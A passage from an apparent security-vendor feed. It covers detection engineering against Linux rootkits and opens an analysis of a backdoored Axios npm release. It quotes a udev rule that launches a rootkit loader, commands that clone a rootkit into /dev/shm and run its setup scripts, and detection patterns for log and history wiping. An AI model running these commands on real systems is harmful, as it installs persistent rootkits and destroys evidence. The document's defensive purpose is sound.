<pre><code class="language-shell">ACTION==&quot;add&quot;, ENV{MAJOR}==&quot;1&quot;, ENV{MINOR}==&quot;8&quot;, RUN+=&quot;/lib/udev/reptile&quot;
</code></pre>
<p>This rule was likely used as inspiration by the <a href="https://www.levelblue.com/blogs/spiderlabs-blog/unveiling-sedexp/">Sedexp</a> malware discovered by Levelblue. Here’s how the rule works:</p>
<ul>
<li><code>ACTION==&quot;add&quot;</code>: Triggers when a new device is added to the system.</li>
<li><code>ENV{MAJOR}==&quot;1&quot;</code>: Matches devices with major number “1”, typically memory-related devices such as <code>/dev/mem</code>, <code>/dev/null</code>, <code>/dev/zero</code>, and <code>/dev/random</code>.</li>
<li><code>ENV{MINOR}==&quot;8&quot;</code>: Further narrows the condition to <code>/dev/random</code>.</li>
<li><code>RUN+=&quot;/lib/udev/reptile&quot;</code>: Executes the Reptile loader binary when the above device is detected.</li>
</ul>
<p>This rule establishes persistence by triggering the execution of a loader binary whenever the <code>/dev/random</code> device is loaded. As a widely used random number generator essential for numerous system applications and the boot process, this method is effective. Activation occurs only upon specific device events, and execution happens with root privileges through the <code>udev daemon</code>. To detect this technique, a detection rule similar to the one below can be created:</p>
<pre><code class="language-sql">file where event.action in (&quot;rename&quot;, &quot;creation&quot;) and file.extension == &quot;rules&quot; and file.path like (
  &quot;/lib/udev/*&quot;,
  &quot;/etc/udev/rules.d/*&quot;,
  &quot;/usr/lib/udev/rules.d/*&quot;,
  &quot;/run/udev/rules.d/*&quot;,
  &quot;/usr/local/lib/udev/rules.d/*&quot;
)
</code></pre>
<p>We cover the creation and modification of these files via the following pre-built rules:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/linux/persistence_udev_rule_creation.toml">Systemd-udevd Rule File Creation</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/integrations/fim/persistence_suspicious_file_modifications.toml">Potential Persistence via File Modification</a></li>
</ul>
<h4>General persistence mechanisms</h4>
<p>In addition to kernel module loading paths, attackers may rely on more generic Linux persistence methods to reload userland or kernel-space rootkits via the loader:</p>
<p><strong>Systemd</strong>: <a href="https://www.elastic.co/security-labs/primer-on-persistence-mechanisms">Create or append to a service/timer</a> under any (e.g., <code>/etc/systemd/system/</code>) directory that supports the loader at boot.</p>
<pre><code class="language-sql">file where event.action in (&quot;rename&quot;, &quot;creation&quot;) and file.path like (
  &quot;/etc/systemd/system/*&quot;, &quot;/etc/systemd/user/*&quot;,
  &quot;/usr/local/lib/systemd/system/*&quot;, &quot;/lib/systemd/system/*&quot;,
  &quot;/usr/lib/systemd/system/*&quot;, &quot;/usr/lib/systemd/user/*&quot;,
  &quot;/home/*.config/systemd/user/*&quot;, &quot;/home/*.local/share/systemd/user/*&quot;,
  &quot;/root/.config/systemd/user/*&quot;, &quot;/root/.local/share/systemd/user/*&quot;
) and file.extension in (&quot;service&quot;, &quot;timer&quot;)
</code></pre>
<p><strong>Initialization scripts</strong>: <a href="https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms">Create or append to a malicious run-control</a> (<code>/etc/rc.local</code>), <a href="https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms">SysVinit</a> (<code>/etc/init.d/</code>), or <a href="https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms">Upstart</a> (<code>/etc/init/</code>) script.</p>
<pre><code class="language-sql">file where event.action in (&quot;creation&quot;, &quot;rename&quot;) and
file.path like (
  &quot;/etc/init.d/*&quot;, &quot;/etc/init/*&quot;, &quot;/etc/rc.local&quot;, &quot;/etc/rc.common&quot;
)
</code></pre>
<p><strong>Cron jobs</strong>: <a href="https://www.elastic.co/security-labs/primer-on-persistence-mechanisms">Create or append to a cron job</a> that allows for repeated execution of a loader.</p>
<pre><code class="language-sql">file where event.action in (&quot;rename&quot;, &quot;creation&quot;) and
file.path like (
  &quot;/etc/cron.allow&quot;, &quot;/etc/cron.deny&quot;, &quot;/etc/cron.d/*&quot;,
  &quot;/etc/cron.hourly/*&quot;, &quot;/etc/cron.daily/*&quot;, &quot;/etc/cron.weekly/*&quot;,
  &quot;/etc/cron.monthly/*&quot;, &quot;/etc/crontab&quot;, &quot;/var/spool/cron/crontabs/*&quot;,
  &quot;/var/spool/anacron/*&quot;
)
</code></pre>
<p><strong>Sudoers</strong>: <a href="https://www.elastic.co/security-labs/primer-on-persistence-mechanisms">Create or append to a malicious sudoers configuration</a> as a backdoor.</p>
<pre><code class="language-sql">file where event.type in (&quot;creation&quot;, &quot;change&quot;) and
file.path like &quot;/etc/sudoers*&quot;
</code></pre>
<p>These methods are widely used, flexible, and often easier to detect using process lineage or file-modification telemetry.</p>
<p>The list of pre-built detection rules to detect these persistence techniques is listed below:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/93d20b1233fc94aea8f4a80062bd1f59069fb0c5/rules/linux/persistence_systemd_service_creation.toml">Systemd Service Created</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/93d20b1233fc94aea8f4a80062bd1f59069fb0c5/rules/linux/persistence_systemd_scheduled_timer_created.toml">Systemd Timer Created</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/93d20b1233fc94aea8f4a80062bd1f59069fb0c5/rules/linux/persistence_init_d_file_creation.toml">System V Init Script Created</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/93d20b1233fc94aea8f4a80062bd1f59069fb0c5/rules/linux/persistence_rc_script_creation.toml">rc.local/rc.common File Creation</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/93d20b1233fc94aea8f4a80062bd1f59069fb0c5/rules/linux/persistence_cron_job_creation.toml">Cron Job Created or Modified</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/cross-platform/privilege_escalation_sudoers_file_mod.toml">Sudoers File Activity</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/integrations/fim/persistence_suspicious_file_modifications.toml">Potential Persistence via File Modification</a></li>
</ul>
<h3>Rootkit defense evasion techniques</h3>
<p>Although rootkits are, by definition, tools for defense evasion, many implement additional techniques to remain undetected during and after deployment. These methods are designed to avoid visibility in logs, evade endpoint detection agents, and interfere with common investigation workflows. The following section outlines key evasion techniques employed by modern Linux rootkits, categorized by their operational targets.</p>
<h4>Attempts to remain stealthy upon deployment</h4>
<p>Threat actors commonly focus on stealthy execution tactics from a forensics perspective. For example, a threat actor may store and execute its payloads from the <code>/dev/shm</code> shared-memory directory, as this is a fully virtual file system, and therefore the payloads will never touch disk. This is great from a forensics perspective, but as behavioral detection engineers, we find this behavior very suspicious and uncommon.</p>
<p>As an example, although not an actual threat actor, Singularity’s author suggests the following deployment method:</p>
<pre><code class="language-shell">cd /dev/shm
git clone https://github.com/MatheuZSecurity/Singularity
cd Singularity
sudo bash setup.sh
sudo bash scripts/x.sh
</code></pre>
<p>There are several trip wires to be installed to detect this behavior with a nearly zero false-positive rate, starting with cloning a GitHub repository into the <code>/dev/shm</code> directory.</p>
<pre><code class="language-sql">sequence by process.entity_id, host.id with maxspan=10s
  [process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and (
     (process.name == &quot;git&quot; and process.args == &quot;clone&quot;) or
     (
       process.name in (&quot;wget&quot;, &quot;curl&quot;) and
       process.command_line like~ &quot;*github*&quot;
     )
  )]
  [file where event.type == &quot;creation&quot; and
   file.path like (&quot;/tmp/*&quot;, &quot;/var/tmp/*&quot;, &quot;/dev/shm/*&quot;)]
</code></pre>
<p>Cloning directories in <code>/tmp</code> and <code>/var/tmp</code> is common, so these could be removed from this rule in environments where cloning repositories is common. The same activity in <code>/dev/shm</code>, however, is very uncommon.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image10.png" alt="Figure 12: Telemetry example of a GitHub repository cloning event in /dev/shm" title="Figure 12: Telemetry example of a GitHub repository cloning event in /dev/shm." /></p>
<p>The <code>setup.sh</code> script, called by the loader, continues by compiling the LKM in a <code>/dev/shm/</code> subdirectory. Real threat actors generally do not compile on the host itself, however, it is not that uncommon to see this happen either way.</p>
<pre><code class="language-sql">sequence with maxspan=10s
  [process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
   process.name like (
     &quot;*gcc*&quot;, &quot;*g++*&quot;, &quot;c++&quot;, &quot;cc&quot;, &quot;c99&quot;, &quot;c89&quot;, &quot;cc1*&quot;, &quot;clang*&quot;,
     &quot;musl-clang&quot;, &quot;tcc&quot;, &quot;zig&quot;, &quot;ccache&quot;, &quot;distcc&quot;
   )] as event0
  [file where event.action == &quot;creation&quot; and file.path like &quot;/dev/shm/*&quot; and
   process.name like (
     &quot;ld&quot;, &quot;ld.*&quot;, &quot;lld&quot;, &quot;ld.lld&quot;, &quot;mold&quot;, &quot;collect2&quot;, &quot;*-linux-gnu-ld*&quot;, 
     &quot;*-pc-linux-gnu-ld*&quot;
   ) and
   stringcontains~(event0.process.command_line, file.name)]
</code></pre>
<p>This endpoint logic detects the execution of a compiler, followed by the linker creating a file in <code>/dev/shm</code> (or a subdirectory).</p>
<p>And finally, since it cloned the whole repository in <code>/dev/shm</code>, and executed <code>setup.sh</code> and <code>x.sh</code>, we will observe process execution from the shared memory directory, which is uncommon in most environments:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.executable like (&quot;/dev/shm/*&quot;, &quot;/run/shm/*&quot;)
</code></pre>
<p>These rules are available within the detection-rules and protections-artifacts repositories:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml">Git Repository or File Download to Suspicious Directory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/331b0c762ef5293cea812a9b676e84527fbe5f73/behavior/rules/linux/defense_evasion_linux_compilation_in_suspicious_directory.toml">Linux Compilation in Suspicious Directory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/473c8536449c12f4e6bf1dc7de4fbded217592a5/behavior/rules/linux/defense_evasion_binary_executed_from_shared_memory_directory.toml">Binary Executed from Shared Memory Directory</a></li>
</ul>
<h4>Masquerading as legitimate processes</h4>
<p>To avoid scrutiny during process enumeration or system monitoring, rootkits often rename their processes and threads to match benign system components. Common disguises include:</p>
<ul>
<li><code>kworker</code>, <code>migration</code>, or <code>rcu_sched</code> (kernel threads)</li>
<li><code>sshd</code>, <code>systemd</code>, <code>dbus-daemon</code>, or <code>bash</code> (userland daemons)</li>
</ul>
<p>These names are chosen to blend in with the output of tools like <code>ps</code>, <code>top</code>, or <code>htop</code>, making manual detection more difficult. Examples of rootkits that leverage this technique include Reptile and <a href="https://www.elastic.co/security-labs/declawing-pumakit">PUMAKIT</a>. Reptile generates unusual network events through <code>kworker</code> upon initialization:</p>
<pre><code class="language-sql">network where event.type == &quot;start&quot; and event.action == &quot;connection_attempted&quot; 
and process.name like~ (&quot;kworker*&quot;, &quot;kthreadd&quot;) and not (
  destination.ip == null or
  destination.ip == &quot;0.0.0.0&quot; or
  cidrmatch(
    destination.ip,
    &quot;10.0.0.0/8&quot;, &quot;127.0.0.0/8&quot;, &quot;169.254.0.0/16&quot;, &quot;172.16.0.0/12&quot;,
    &quot;192.0.0.0/24&quot;, &quot;192.0.0.0/29&quot;, &quot;192.0.0.8/32&quot;, &quot;192.0.0.9/32&quot;,
    &quot;192.0.0.10/32&quot;, &quot;192.0.0.170/32&quot;, &quot;192.0.0.171/32&quot;, &quot;192.0.2.0/24&quot;, 
    &quot;192.31.196.0/24&quot;, &quot;192.52.193.0/24&quot;, &quot;192.168.0.0/16&quot;, &quot;192.88.99.0/24&quot;,
    &quot;224.0.0.0/4&quot;, &quot;100.64.0.0/10&quot;, &quot;192.175.48.0/24&quot;,&quot;198.18.0.0/15&quot;, 
    &quot;198.51.100.0/24&quot;, &quot;203.0.113.0/24&quot;, &quot;240.0.0.0/4&quot;, &quot;::1&quot;,
    &quot;FE80::/10&quot;, &quot;FF00::/8&quot;
  )
)
</code></pre>
<p>The example below shows Reptile’s port knocking functionality, where the kernel thread forks, changes its session ID to 0, and sets up the network connection:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image5.png" alt="Figure 13: Telemetry example of Reptile’s port knocking via a kernel worker thread" title="Figure 13: Telemetry example of Reptile’s port knocking via a kernel worker thread." /></p>
<p>Reptile is also seen to leverage the same <code>kworker</code> process to create files:</p>
<pre><code class="language-sql">file where event.type == &quot;creation&quot; and
process.name like~ (&quot;kworker*&quot;, &quot;kthreadd&quot;)
</code></pre>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image4.png" alt="Figure 14: Telemetry example of a /dev/ptmx file creation from Reptile’s kernel worker thread" title="Figure 14: Telemetry example of a /dev/ptmx file creation from Reptile’s kernel worker thread." /></p>
<p><a href="https://www.elastic.co/security-labs/declawing-pumakit">PUMAKIT</a> spawns kernel threads to execute userland commands through <code>kthreadd</code>, but similar activity has been observed through a <code>kworker</code> process in other rootkits:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.parent.name like~ (&quot;kworker*&quot;, &quot;kthreadd&quot;) and
process.name in (&quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;) and
process.args == &quot;-c&quot;
</code></pre>
<p>These <code>kworker</code> and <code>kthreadd</code> rules may generate false positives due to the Linux kernel's internal operations. These can easily be excluded on a per-environment basis, or additional command-line arguments can be added to the logic.</p>
<p>These rules are available in the detection-rules and protections-artifacts repositories:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/command_and_control_linux_kworker_netcon.toml">Network Activity Detected via Kworker</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/persistence_kworker_file_creation.toml">Suspicious File Creation via Kworker</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/privilege_escalation_kworker_uid_elevation.toml">Suspicious Kworker UID Elevation</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/473c8536449c12f4e6bf1dc7de4fbded217592a5/behavior/rules/linux/defense_evasion_shell_command_execution_via_kworker.toml">Shell Command Execution via Kworker</a></li>
</ul>
<p>Additionally, malicious processes, such as an initial dropper or a persistence mechanism, may masquerade as kernel threads and leverage a built-in shell function to do so. Leveraging the <code>exec -a</code> command, any process can be spawned with a name of the attacker’s choosing. Kernel process masquerading can be detected through the following detection query:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and 
process.command_line like &quot;[*]&quot; and process.args_count == 1
</code></pre>
<p>This behavior is shown below, where several pieces of malware tried to masquerade as either a kernel worker or a web service process.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image8.png" alt="Figure 15: Telemetry example of several malwares masquerading as kernel processes" title="Figure 15: Telemetry example of several malwares masquerading as kernel processes." /></p>
<p>This technique is also commonly abused by threat actors leveraging The Hacker’s Choice (THC) toolkit, specifically upon deploying <a href="https://github.com/hackerschoice/gsocket">gsocket</a>.</p>
<p>Rules related to kernel masquerading, and masquerading via <code>exec -a</code> generally, are available in the protections-artifacts repository:</p>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/473c8536449c12f4e6bf1dc7de4fbded217592a5/behavior/rules/linux/defense_evasion_process_masquerading_as_kernel_process.toml">Process Masquerading as Kernel Process</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/473c8536449c12f4e6bf1dc7de4fbded217592a5/behavior/rules/linux/defense_evasion_potential_process_masquerading_via_exec.toml">Potential Process Masquerading via Exec</a></li>
</ul>
<p>Another technique seen in the wild, and also in <a href="https://www.blackhat.com/docs/us-16/materials/us-16-Leibowitz-Horse-Pill-A-New-Type-Of-Linux-Rootkit.pdf">Horse Pill</a>, is the use of <code>prctl</code> to stomp its process name. To ensure this telemetry is available, a custom Auditd rule can be created:</p>
<pre><code class="language-sql">-a exit,always -F arch=b64 -S prctl -k prctl_detection
</code></pre>
<p>And accompanied by the following detection logic:</p>
<pre><code class="language-sql">process where host.os.type == &quot;linux&quot; and auditd.data.syscall == &quot;prctl&quot; and
auditd.data.a0 == &quot;f&quot;
</code></pre>
<p>Will allow for the detection of this technique. In the screenshot below, we can see telemetry examples of this technique being used, where the <code>process.executable</code> is gibberish, and <code>prctl</code> will then be used to masquerade on the system as a legitimate process.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image14.png" alt="Figure 16: Telemetry example of several malwares leveraging prctl to stomp their process names" title="Figure 16: Telemetry example of several malwares leveraging prctl to stomp their process names." /></p>
<p>This rule, including its setup instructions, is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/defense_evasion_prctl_process_name_tampering.toml">Potential Process Name Stomping with Prctl</a></li>
</ul>
<p>Although there are many ways to masquerade, these are the most common ones observed.</p>
<h4>Log and audit cleansing</h4>
<p>Many rootkits include routines that erase traces of their installation or activity from logs. One of these techniques is to clear the victim’s shell history. This can be detected in two ways. One method is to detect the deletion of the shell history file:</p>
<pre><code class="language-sql">file where event.type == &quot;deletion&quot; and file.name in (
  &quot;.bash_history&quot;, &quot;.zsh_history&quot;, &quot;.sh_history&quot;, &quot;.ksh_history&quot;,
  &quot;.history&quot;, &quot;.csh_history&quot;, &quot;.tcsh_history&quot;, &quot;fish_history&quot;
)
</code></pre>
<p>The second method is to detect process executions with command line arguments related to clearing the shell history:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and (
  (
    process.args in (&quot;rm&quot;, &quot;echo&quot;) or
    (
      process.args == &quot;ln&quot; and process.args == &quot;-sf&quot; and
      process.args == &quot;/dev/null&quot;
    ) or
    (process.args == &quot;truncate&quot; and process.args == &quot;-s0&quot;)
  )
  and process.command_line like~ (
    &quot;*.bash_history*&quot;, &quot;*.zsh_history*&quot;, &quot;*.sh_history*&quot;, &quot;*.ksh_history*&quot;,
    &quot;*.history*&quot;, &quot;*.csh_history*&quot;, &quot;*.tcsh_history*&quot;, &quot;*fish_history*&quot;
  )
) or
(process.name == &quot;history&quot; and process.args == &quot;-c&quot;) or
(
  process.args == &quot;export&quot; and
  process.args like~ (&quot;HISTFILE=/dev/null&quot;, &quot;HISTFILESIZE=0&quot;)
) or
(process.args == &quot;unset&quot; and process.args like~ &quot;HISTFILE&quot;) or
(process.args == &quot;set&quot; and process.args == &quot;history&quot; and process.args == &quot;+o&quot;)
</code></pre>
<p>Having both detection rules (process and file) active will enable a more robust defense-in-depth strategy.</p>
<p>Upon loading, rootkits may taint the kernel or generate out-of-tree messages that can be identified when parsing syslog and kernel logs. To erase their tracks, rootkits may delete these log files:</p>
<pre><code class="language-sql">file where event.type == &quot;deletion&quot; and file.path in (
  &quot;/var/log/syslog&quot;, &quot;/var/log/messages&quot;, &quot;/var/log/secure&quot;, 
  &quot;/var/log/auth.log&quot;, &quot;/var/log/boot.log&quot;, &quot;/var/log/kern.log&quot;, 
  &quot;/var/log/dmesg&quot;
)
</code></pre>
<p>Or clear the kernel message buffer through <code>dmesg</code>:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.name == &quot;dmesg&quot; and process.args in (&quot;-c&quot;, &quot;--clear&quot;)
</code></pre>
<p>An example of a rootkit that automatically cleans the <a href="https://man7.org/linux/man-pages/man1/dmesg.1.html">dmesg</a> is the <a href="https://github.com/bluedragonsecurity/bds_lkm">bds rootkit</a>, which loads by executing <code>/opt/bds_elf/bds_start.sh</code>:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image12.png" alt="Figure 17: Telemetry example of bds’s kernel buffer ring clearing via dmesg" title="Figure 17: Telemetry example of bds’s kernel buffer ring clearing via dmesg." /></p>
<p>Another means of clearing these logs is by using <a href="https://man7.org/linux/man-pages/man1/journalctl.1.html">journalctl</a>:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.name == &quot;journalctl&quot; and
process.args like (&quot;--vacuum-time=*&quot;, &quot;--vacuum-size=*&quot;, &quot;--vacuum-files=*&quot;)
</code></pre>
<p>This is a technique that was used by Singularity:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image11.png" alt="Figure 18: Telemetry example of Singularity attempting to clear logs via journalctl" title="Figure 18: Telemetry example of Singularity attempting to clear logs via journalctl." /></p>
<p>Another technique employed by Singularity’s loader script is the deletion of all files associated to the rootkit in case it cannot load, or once it completes its loading process. For more thorough deletion, the author chose the use of <code>shred</code> over <code>rm</code>. <code>rm</code> (remove) simply deletes the file's pointer, making it fast but allowing for data recovery. <code>shred</code> overwrites the file data multiple times with random data, ensuring it cannot be recovered. This makes the deletion more permanent but, at the same time, noisier from a behavior-detection point of view, since <code>shred</code> is not commonly used on most Linux systems.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.name == &quot;shred&quot; and (
// Any short-flag cluster containing at least one of u/z, 
// and containing no extra &quot;-&quot; after the first one
process.args regex~ &quot;-[^-]*[uz][^-]*&quot; or
process.args in (&quot;--remove&quot;, &quot;--zero&quot;)
) and
not process.parent.name == &quot;logrotate&quot;
</code></pre>
<p>The regex above ensures that attempts to evade detection by combining or modifying flags become more difficult. Below is an example of Singularity looking for any files related to its deployment, and shredding them:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image13.png" alt="Figure 19: Telemetry example of a rootkit’s loading process attempting to shred any evidence" title="Figure 19: Telemetry example of a rootkit’s loading process attempting to shred any evidence." /></p>
<p>These file and log removal techniques can be detected via several out-of-the-box detection rules:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/defense_evasion_log_files_deleted.toml">System Log File Deletion</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/defense_evasion_clear_kernel_ring_buffer.toml">Attempt to Clear Kernel Ring Buffer</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/defense_evasion_journalctl_clear_logs.toml">Attempt to Clear Logs via Journalctl</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/defense_evasion_file_deletion_via_shred.toml">File Deletion via Shred</a></li>
</ul>
<p>Once a rootkit is finished clearing its traces, it may timestomp the files it altered to ensure no file modification trace is left behind:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.name == &quot;touch&quot; and
process.args like (
  &quot;-t*&quot;, &quot;-d*&quot;, &quot;-a*&quot;, &quot;-m*&quot;, &quot;-r*&quot;, &quot;--date=*&quot;, &quot;--reference=*&quot;, &quot;--time=*&quot;
)
</code></pre>
<p>An example of this is shown here, where a threat actor uses the <code>/etc/ld.so.conf</code> file’s timestamp as a reference time to the files on the <code>/dev/shm</code> drive in an attempt to blend in:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image3.png" alt="Figure 20: Telemetry example of a threat actor attempting to timestomp their payload in /dev/shm" title="Figure 20: Telemetry example of a threat actor attempting to timestomp their payload in /dev/shm." /></p>
<p>This is a technique that we have added coverage for via both detection rules and protection artifacts:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/cross-platform/defense_evasion_timestomp_touch.toml">Timestomping using Touch Command</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/473c8536449c12f4e6bf1dc7de4fbded217592a5/behavior/rules/linux/defense_evasion_timestomping_detected_via_touch.toml">Timestomping Detected via Touch</a></li>
</ul>
<p>Although there are always more techniques we did not discuss in this research, we are confident that this research will help deepen the understanding of the Linux rootkit landscape and its detection engineering.</p>
<h2>Rootkit prevention techniques</h2>
<p>Preventing Linux rootkits requires a layered defense strategy that combines kernel and userland hardening, strict access control, and continuous monitoring. Mandatory access control frameworks, such as SELinux and AppArmor, limit process behavior and userland persistence opportunities. Meanwhile, kernel hardening techniques, including Lockdown Mode, KASLR, SMEP/SMAP, and tools like LKRG, mitigate the risk of kernel-level compromise. Restricting kernel module usage by disabling dynamic loading or enforcing module signing further reduces common vectors for rootkit deployment.</p>
<p>Visibility into malicious behavior is enhanced through Auditd and file integrity monitoring for syscall and file activity, as well as through EDR solutions that identify and prevent suspicious runtime behaviors. Security is further strengthened by minimizing process privileges through <code>seccomp-bpf</code>, Linux capabilities, and the landlock LSM, thereby restricting syscall access and filesystem interactions.</p>
<p>Timely kernel and software updates, supported by live patching when necessary, close known vulnerabilities before they are exploited. Additionally, filesystem and device configurations should be hardened by remounting sensitive filesystems with restrictive flags and disabling access to kernel memory interfaces, such as <code>/dev/mem</code> and <code>/proc/kallsyms</code>.</p>
<p>No single control can prevent rootkits outright. A layered defense, combining configuration hardening, static and dynamic detection, and forensic readiness, remains essential.</p>
<h2>Conclusion</h2>
<p>In <a href="https://www.elastic.co/security-labs/linux-rootkits-1-hooked-on-linux">part one of this series</a>, we examined how Linux rootkits operate internally, exploring their evolution, taxonomy, and techniques for manipulating user space and kernel space. In this second part, we translated that knowledge into practical detection strategies, focusing on the behavioral signals and runtime telemetry that expose rootkit activity.</p>
<p>While Windows malware continues to dominate the focus of commercial security vendors and threat research communities, Linux remains comparatively under-researched, despite powering the majority of the world’s cloud infrastructure, high-performance computing environments, and internet services.</p>
<p>Our analysis highlights that Linux rootkits are evolving. The increasing adoption of technologies such as eBPF, <code>io_uring</code>, and containerized Linux workloads introduces new attack surfaces that are not yet well understood or widely protected.</p>
<p>We encourage the security community to:</p>
<ul>
<li>Invest in Linux-focused detection engineering from both static and dynamic angles.</li>
<li>Share research findings, proofs of concept, and detection strategies openly to accelerate collective knowledge among defenders.</li>
<li>Collaborate across vendors, academia, and industry to push Linux rootkit defense toward the same maturity level achieved on Windows.</li>
</ul>
<p>Only by collectively improving visibility, detection, and response capabilities can defenders stay ahead of this stealthy and rapidly evolving threat landscape.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/linux-rootkits-2-caught-in-the-act.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Inside the Axios supply chain compromise - one RAT to rule them all]]></title>
            <link>https://www.elastic.co/security-labs/axios-one-rat-to-rule-them-all</link>
            <guid>axios-one-rat-to-rule-them-all</guid>
            <pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs analyzes a supply chain compromise of the axios npm package delivering a unified cross-platform RAT]]></description>
            <content:encoded><![CDATA[<blockquote>
<p>Elastic Security Labs released <a href="https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections">initial triage and detection rules</a> for the Axios supply-chain compromise. This is a detailed analysis of the RAT and payloads.</p>
</blockquote>
<h2>Introduction</h2>
<p>Elastic Security Labs identified a supply chain compromise of the axios npm package, one of the most depended-upon packages in the JavaScript ecosystem with approximately 100 million weekly downloads. The attacker compromised a maintainer account and published backdoored versions that delivered a cross-platform Remote Access Trojan to macOS, Windows, and Linux systems through a malicious postinstall hook.</p>
<h3>Key takeaways</h3>
<ul>
<li>A compromised npm maintainer account (jasonsaayman) was used to publish two malicious versions of the widely used Axios HTTP client — 1.14.1 (tagged latest) and 0.30.4 (tagged legacy) — meaning a default npm install axios resolved to a backdoored package</li>
<li>The malicious JavaScript deploys platform-specific stage-2 implants for macOS, Windows, and Linux</li>
<li>All three stage-2 payloads are implementations of the <strong>same RAT</strong> — identical C2 protocol, command set, beacon cadence, and spoofed user-agent, written in PowerShell (Windows), C++ (macOS), and Python (Linux)</li>
<li>The dropper performs anti-forensic cleanup by deleting itself and swapping its package.json with a clean copy, erasing evidence of the postinstall trigger from <code>node_modules</code></li>
</ul>
<h2>Preamble</h2>
<p>On March 30, 2026, Elastic Security Labs detected a supply chain compromise targeting the <a href="https://www.npmjs.com/package/axios">axios</a> npm package through automated supply-chain monitoring. The attacker gained control of the npm account belonging to jasonsaayman, one of the project's primary maintainers, and published two backdoored versions within a 39-minute window.</p>
<p>The axios package is one of the most widely depended-upon HTTP client libraries in the JavaScript ecosystem. At the time of discovery, both the latest and legacy dist-tags pointed to compromised versions, ensuring that the majority of fresh installations pulled a backdoored release.</p>
<p>The malicious versions introduced a single new dependency: plain-crypto-js, a purpose-built package whose postinstall hook silently downloaded and executed platform-specific stage-2 RAT implants from sfrclak[.]com:8000.</p>
<p>What makes this campaign notable beyond its blast radius is the stage-2 tooling. The attacker deployed three parallel implementations of the <strong>same RAT</strong> — one each for Windows, macOS, and Linux — all sharing an identical C2 protocol, command structure, and beacon behavior. This isn't three different tools; it's a single cross-platform implant framework with platform-native implementations.</p>
<p>Elastic Security Labs filed a GitHub Security Advisory to the axios repository on <strong>March 31, 2026 at 01:50 AM UTC</strong> to coordinate disclosure and ensure the maintainers and npm registry could act on the compromised versions.</p>
